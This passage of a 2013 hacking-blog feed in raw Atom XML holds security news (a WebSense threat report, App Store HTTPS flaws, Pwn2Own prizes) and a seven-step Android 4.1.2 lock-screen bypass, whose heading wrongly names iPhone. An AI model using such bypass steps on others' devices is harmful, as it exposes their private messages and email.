&lt;li&gt;Potentially Damaging Content | Suspicious sites with little or no useful content.&lt;/li&gt;
&lt;li&gt;Web and Email Spam | Sites used in unsolicited commercial email.&lt;/li&gt;
&lt;li&gt;Malicious Websites | Sites containing malicious code.&lt;/li&gt;
&lt;li&gt;Phishing and other Frauds | Sites that counterfeit legitimate sites to elicit user information.&lt;/li&gt;
&lt;li&gt;Malicious Embedded iFrame.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;You can &lt;b&gt;read the full report by WebSense&lt;/b&gt; which clearly states;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i style="background-color: white; text-align: -webkit-auto;"&gt;&lt;span style="font-family: inherit;"&gt;“Solutions that focus solely on mobile, email, web or otherwise can no longer be trusted to defend against complex, multistage attacks that can move between attack vectors.”&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i style="background-color: white; text-align: -webkit-auto;"&gt;&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="background-color: white; text-align: -webkit-auto;"&gt;&lt;span style="font-family: inherit;"&gt;Wise friends, we are no longer... ALONE!&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="background-color: white; text-align: -webkit-auto;"&gt;&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="background-color: white; text-align: -webkit-auto;"&gt;&lt;span style="font-family: inherit;"&gt;Cheers!&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="background-color: white; text-align: -webkit-auto;"&gt;&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="background-color: white; text-align: -webkit-auto;"&gt;&lt;b&gt;&lt;span style="font-family: inherit;"&gt;About the Author:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="background-color: white; text-align: -webkit-auto;"&gt;&lt;span style="font-family: inherit;"&gt;This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;ul style="font-size: 13px; line-height: 19px; list-style: none inside; margin: 1em 0px; padding: 0px 1em; text-align: -webkit-auto;"&gt;
&lt;li style="background-color: #3c3c3c; color: #999999; font-family: 'Lucida Grande', Helvetica, Arial, sans-serif;"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AkAohidOhdw:Zy5EhK81TWI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AkAohidOhdw:Zy5EhK81TWI:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AkAohidOhdw:Zy5EhK81TWI:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=AkAohidOhdw:Zy5EhK81TWI:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AkAohidOhdw:Zy5EhK81TWI:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=AkAohidOhdw:Zy5EhK81TWI:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AkAohidOhdw:Zy5EhK81TWI:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AkAohidOhdw:Zy5EhK81TWI:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=AkAohidOhdw:Zy5EhK81TWI:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AkAohidOhdw:Zy5EhK81TWI:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=AkAohidOhdw:Zy5EhK81TWI:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/AkAohidOhdw" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/1707009763556054868/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/600-increase-in-cyber-attacks-websense.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/1707009763556054868?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/1707009763556054868?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/AkAohidOhdw/600-increase-in-cyber-attacks-websense.html" title="600% Increase In Cyber Attacks: WebSense Releases Threat Report 2013" /><author><name>Dr. Sindhia Javed Junejo</name><uri>http://www.blogger.com/profile/01429590087313279750</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://4.bp.blogspot.com/-q7qO-M4AY2E/UIRbUxdSx8I/AAAAAAAAAwE/dUwQNL1DQVk/s220/V_mask.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-qjSyBsEJVko/UT8gQtKU-JI/AAAAAAAABBg/OLtrr_awdVI/s72-c/GeoGrowthInfectedSites.bmp" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/600-increase-in-cyber-attacks-websense.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0YCRn4_fip7ImA9WhBQFUw.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-3797669265033617186</id><published>2013-03-10T12:17:00.000-07:00</published><updated>2013-03-17T03:12:47.046-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-17T03:12:47.046-07:00</app:edited><title>Vulnerabilities Fixed in App Store Almost After A Year</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-TJWW7ipIHsM/UTzRjp2hBWI/AAAAAAAABBA/7tv45GOyD30/s1600/apple_bug.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="305" src="http://4.bp.blogspot.com/-TJWW7ipIHsM/UTzRjp2hBWI/AAAAAAAABBA/7tv45GOyD30/s400/apple_bug.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
It is being reported that Apple has ignored its network's security for more than a year. A problem that a &amp;nbsp;Google developer has pointed out.&lt;br /&gt;
&lt;br /&gt;
Google Researcher, Elie Bursztein has stated on this &lt;b&gt;&lt;a href="http://elie.im/blog/web/apple-finally-turns-https-on-for-the-app-store-fixing-a-lot-of-vulnerabilities/#.UTzPIqWpWfT" rel="nofollow" target="_blank"&gt;blog&lt;/a&gt;&lt;/b&gt; that he had informed Apple of the security problems present in App Store that allowed attackers to steal passwords and/or install unwanted or expensive applications. &lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;This was done by exploiting Apple's resistance to use encryptions when any iDevice logged into App Store. This allowed the attacker to intercept communication occurring between an online user's device and App Store and insert his own commands into the system.&lt;br /&gt;
&lt;br /&gt;
The vulnerability could be exploited to carry out quite a few attacks on the user&lt;b&gt;&lt;a href="http://elie.im/blog/web/apple-finally-turns-https-on-for-the-app-store-fixing-a-lot-of-vulnerabilities/#.UTzPIqWpWfT" rel="nofollow" target="_blank"&gt; according to Elie&lt;/a&gt;&lt;/b&gt;:&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;div style="line-height: 1.5em; margin-bottom: 15px; margin-top: 15px; padding: 0px; text-align: justify;"&gt;
&lt;span style="background-color: white; font-family: inherit;"&gt;-&amp;nbsp;&lt;strong&gt;Password stealing&lt;/strong&gt;: Trick the user into disclosing his or her password by using the application update notification mechanism to insert a fake prompt when the App Store is launched.&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 1.5em; margin-bottom: 15px; margin-top: 15px; padding: 0px; text-align: justify;"&gt;
&lt;span style="background-color: white; font-family: inherit;"&gt;-&amp;nbsp;&lt;strong&gt;App swapping&lt;/strong&gt;: Force the user to install/buy the attacker’s app of choice instead of the one the user intended to install/buy. It is possible to swap a free app with a paid app.&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 1.5em; margin-bottom: 15px; margin-top: 15px; padding: 0px; text-align: justify;"&gt;
&lt;span style="background-color: white; font-family: inherit;"&gt;-&amp;nbsp;&lt;strong&gt;App fake upgrade&lt;/strong&gt;: Trick the user into installing/buying the attacker’s app of choice by inserting fake app upgrades, or manipulating existing app upgrades.&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 1.5em; margin-bottom: 15px; margin-top: 15px; padding: 0px; text-align: justify;"&gt;
&lt;span style="background-color: white; font-family: inherit;"&gt;-&amp;nbsp;&lt;strong&gt;Preventing application installation&lt;/strong&gt;: Prevent the user from installing/upgrading applications either by stripping the app out of the market or tricking the app into believing it is already installed.&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 1.5em; margin-bottom: 15px; margin-top: 15px; padding: 0px; text-align: justify;"&gt;
&lt;span style="background-color: white; font-family: inherit;"&gt;-&amp;nbsp;&lt;strong&gt;Privacy leak&lt;/strong&gt;: The App Store application update mechanism discloses in the clear the list of the applications installed on the device.&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
Apple responded to Elie's reports by switching on HTTPS for App Store only last week after a year of stalling appropriate decisions.&lt;br /&gt;
&lt;br /&gt;
Cheers!&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;About the Author:&lt;/b&gt;&lt;br /&gt;
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ml7MZ9DpKH0:99tnS50pF3M:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ml7MZ9DpKH0:99tnS50pF3M:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ml7MZ9DpKH0:99tnS50pF3M:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ml7MZ9DpKH0:99tnS50pF3M:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ml7MZ9DpKH0:99tnS50pF3M:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ml7MZ9DpKH0:99tnS50pF3M:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ml7MZ9DpKH0:99tnS50pF3M:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ml7MZ9DpKH0:99tnS50pF3M:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ml7MZ9DpKH0:99tnS50pF3M:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ml7MZ9DpKH0:99tnS50pF3M:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ml7MZ9DpKH0:99tnS50pF3M:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/ml7MZ9DpKH0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/3797669265033617186/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/vulnerabilities-fixed-in-app-store.html#comment-form" title="3 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3797669265033617186?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3797669265033617186?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/ml7MZ9DpKH0/vulnerabilities-fixed-in-app-store.html" title="Vulnerabilities Fixed in App Store Almost After A Year" /><author><name>Dr. Sindhia Javed Junejo</name><uri>http://www.blogger.com/profile/01429590087313279750</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://4.bp.blogspot.com/-q7qO-M4AY2E/UIRbUxdSx8I/AAAAAAAAAwE/dUwQNL1DQVk/s220/V_mask.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-TJWW7ipIHsM/UTzRjp2hBWI/AAAAAAAABBA/7tv45GOyD30/s72-c/apple_bug.jpg" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/vulnerabilities-fixed-in-app-store.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEEDQXo8eip7ImA9WhBRF0o.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-2987343850050445575</id><published>2013-03-08T13:04:00.001-08:00</published><updated>2013-03-08T13:04:30.472-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-08T13:04:30.472-08:00</app:edited><title>How To Dodge Android 4.1.2 Passcode Lock - Vulnerability Exploited And Explained</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-Z_mQ87RcbfU/UTpRqgijkPI/AAAAAAAABAw/xckX1_10k2k/s1600/Android-4.1-Jelly-Bean-Logo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-Z_mQ87RcbfU/UTpRqgijkPI/AAAAAAAABAw/xckX1_10k2k/s400/Android-4.1-Jelly-Bean-Logo.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: inherit;"&gt;Do you want to elude Note II's security even for a brief moment? &lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2013/02/how-to-dodge-ios-612-passcode.html" target="_blank"&gt;With iOS 6.1.2 being owned by hackers&lt;/a&gt;&lt;/b&gt;, it was time that someone took a look at Android's vulnerabilities.&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;The method that we are going to explain to you to bypass Android's security was found by Terence Eden on Samsung Galaxy Note II running Android 4.1.2. It allows users to temporarily get around the phone's lock screen without a password.&lt;/span&gt;&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;b style="background-color: white; color: #333333; line-height: 19px;"&gt;You can by-pass iPhone, iPad or iPod's security by following the steps given below:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;b style="background-color: white; color: #333333; line-height: 19px;"&gt;&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;1. Make sure your device is locked.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;2. Activate the screen.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;3. Enter "Emergency Call".&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;4. Tap on the "ICE" button found on the bottom left.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;5. Press and hold the home button for a few seconds and then release it.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;6. The phone's home screen will be displayed.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;7. While the home screen is visible click on any app or widget and it will launch without the password.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: inherit;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333;"&gt;&lt;span style="line-height: 19px;"&gt;You can view messages or emails via this method briefly. It has also been reported that not all apps are vulnerable to this exploit.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;b&gt;&lt;u&gt;Disclaimer: &lt;/u&gt;&lt;/b&gt;&lt;i&gt;We request our readers to attempt the above hack at their own risk and for their own knowledge.&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333;"&gt;&lt;span style="line-height: 19px;"&gt;Cheers!&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;b&gt;About the Author:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #333333;"&gt;&lt;span style="line-height: 19px;"&gt;This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=iRwgmihwgeQ:HUD20L2AYd4:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=iRwgmihwgeQ:HUD20L2AYd4:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=iRwgmihwgeQ:HUD20L2AYd4:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=iRwgmihwgeQ:HUD20L2AYd4:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=iRwgmihwgeQ:HUD20L2AYd4:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=iRwgmihwgeQ:HUD20L2AYd4:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=iRwgmihwgeQ:HUD20L2AYd4:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=iRwgmihwgeQ:HUD20L2AYd4:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=iRwgmihwgeQ:HUD20L2AYd4:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=iRwgmihwgeQ:HUD20L2AYd4:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=iRwgmihwgeQ:HUD20L2AYd4:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/iRwgmihwgeQ" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/2987343850050445575/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/how-to-dodge-android-412-passcode-lock.html#comment-form" title="3 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/2987343850050445575?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/2987343850050445575?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/iRwgmihwgeQ/how-to-dodge-android-412-passcode-lock.html" title="How To Dodge Android 4.1.2 Passcode Lock - Vulnerability Exploited And Explained" /><author><name>Dr. Sindhia Javed Junejo</name><uri>http://www.blogger.com/profile/01429590087313279750</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://4.bp.blogspot.com/-q7qO-M4AY2E/UIRbUxdSx8I/AAAAAAAAAwE/dUwQNL1DQVk/s220/V_mask.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-Z_mQ87RcbfU/UTpRqgijkPI/AAAAAAAABAw/xckX1_10k2k/s72-c/Android-4.1-Jelly-Bean-Logo.jpg" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/how-to-dodge-android-412-passcode-lock.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0QERns-eip7ImA9WhBRFks.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-8040287862778617892</id><published>2013-03-07T07:15:00.001-08:00</published><updated>2013-03-07T07:15:07.552-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-07T07:15:07.552-08:00</app:edited><title>The Rise Of Ethical Hackers - Let The Bounty Hunting Begin!</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-TrKNWySxTtQ/UTiH2T9t2HI/AAAAAAAABAQ/Nd8Fsv47UHo/s1600/hacking.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="480" src="http://3.bp.blogspot.com/-TrKNWySxTtQ/UTiH2T9t2HI/AAAAAAAABAQ/Nd8Fsv47UHo/s640/hacking.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Well, well well! It seems like our own favourite ethical hacker, &lt;a href="http://www.rafayhackingarticles.net/2009/03/about-me.html" target="_blank"&gt;&lt;b&gt;Rafay Baloch&lt;/b&gt;&lt;/a&gt;, is about to meet the clan &amp;nbsp;with whom he shares his talents! If you still haven't figured out who R.B is, please do your homework before falling in love with us! (yes, I said it!)&lt;br /&gt;
&lt;br /&gt;
Security researchers and ethical hackers are massing up in Vancouver at the CanSecWest conference this time of the year. The crowd is going to be equipped and ready to hunt down every vulnerability possible in Chrome, Internet, Explorer and Java (&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2013/02/facebooks-security-breeched-java-zero.html" target="_blank"&gt;good riddance since Java has attacked over and over again since 2013 began&lt;/a&gt;&lt;/b&gt;). And in doing so, they will be able to bag generous cash prizes.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Pwn2Own is organising the event offering over half a million dollars in cash prizes for anyone who successfully attempts to ethically hack a selected target.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;The rules are simple:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
1. Vulnerability has to be previously unknown.&lt;br /&gt;
2. Computers should be running fully patched versions of Windows 7, 8 and OS X Mountain Lion&lt;br /&gt;
3. A full sandbox (if present) escape is required to win.&lt;/blockquote&gt;
&lt;br /&gt;
&lt;b&gt;&lt;a href="http://dvlabs.tippingpoint.com/Pwn2OwnContestRules.html" rel="nofollow" target="_blank"&gt;Rules and Regulations&lt;/a&gt;&lt;/b&gt; from Pwn2Own can be found on their link.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;The list of targets and the cash prizes to be won are:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul style="text-align: -webkit-auto;"&gt;
&lt;li&gt;Web Browser&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;Google Chrome on Windows 7: $100,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)&lt;/li&gt;
